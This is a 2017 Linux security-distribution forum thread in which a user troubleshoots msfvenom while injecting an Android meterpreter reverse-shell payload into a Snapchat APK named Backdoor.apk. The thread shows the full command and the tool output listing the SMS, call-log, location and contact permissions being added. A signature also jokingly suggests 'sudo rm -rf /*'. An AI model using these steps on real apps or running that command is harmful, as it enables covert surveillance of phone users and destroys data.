Author Topic: Msvenom apk platform error  (Read 22481 times)

MarcoRossi

  • Newbie
  • *
  • Posts: 3
    • View Profile
on: August 05, 2017, 04:24:11 PM
Hi I had Parrot OS as operating system, but now I set BackBox 5.
When launching msfvenom -x <payload original> lhost = ip lport = port -o backdoor.apk
I get error, can anyone help me?

Error:
Error: Malformed version number string 17:21:50 up 19 min, 2 users, load avarage: 0,00, 0,06, 0,14



ZEROF

  • Hero Member
  • *****
  • Posts: 1246
    • View Profile
    • Pen Tester
Reply #1 on: August 07, 2017, 09:54:52 AM
Hi,

Are you sure that your are using good command, your output show that some of your args are not good, there is no space for lshot= for example. You need to add -p even for custom payload, like -p -.


Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*


MarcoRossi

  • Newbie
  • *
  • Posts: 3
    • View Profile
Reply #2 on: August 07, 2017, 03:46:44 PM
You are right I did not write it because it seemed obvious to me, but the complete command I use is "msfvenom -x <original> -p android/meterpreter/reverse_tcp lhost = xxx.xxx.xxx.xxx lport = xxxx -o /home/<name>/Backdoor.apk "

I used this command on Parrot OS is working perfectly



MarcoRossi

  • Newbie
  • *
  • Posts: 3
    • View Profile
Reply #3 on: August 11, 2017, 03:41:44 PM
I update my version of apktool but now i see this eror:

<name>@backbox:~/Scaricati$ sudo msfvenom -x snapchat.apk -p android/meterpreter/reverse_tcp LHOST=<ip address> LPORT=<port> -o Backdoor.apk
Using APK template: snapchat.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
  • Creating signing key and keystore..
  • Decompiling original APK..
  • Decompiling payload APK..
  • Locating hook point..
  • Adding payload as package com.snapchat.android.eqfzo
  • Loading /tmp/d20170811-10776-bd3o30/original/smali/com/snapchat/android/AppShell.smali and injecting payload..
  • Poisoning the manifest with meterpreter permissions..
  • Adding <uses-permission android:name="android.permission.READ_SMS"/>
  • Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
  • Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
  • Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
  • Adding <uses-permission android:name="android.permission.SEND_SMS"/>
  • Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
  • Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
  • Adding <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  • Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
  • Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
  • Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
  • Rebuilding snapchat.apk with meterpreter injection as /tmp/d20170811-10776-bd3o30/output.apk

Error: Unable to rebuild apk with apktool
<name>@backbox:~/Scaricati$

How can I resolve?



ZEROF

  • Hero Member
  • *****
  • Posts: 1246
    • View Profile
    • Pen Tester
Reply #4 on: October 02, 2017, 09:29:48 PM
I didn't have time to check on this one, but it's best to check their github and open issue there, we didn't work on this tool and time for testing is kind limited on our side.


Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*


ostendali

  • Global Moderator
  • Hero Member
  • *****
  • Posts: 583
    • View Profile
Reply #5 on: October 03, 2017, 12:34:56 PM
just googling would have told you the answer that the issue is not with BackBox but rather the tools or apk you are using...

I did nothing but just googled the error and picked the first results:
     https://github.com/dana-at-cp/backdoor-apk/issues/105
     https://github.com/rapid7/metasploit-framework/issues/8829

pls do preliminary search and don't just hop in here on forum for a ready meal!!!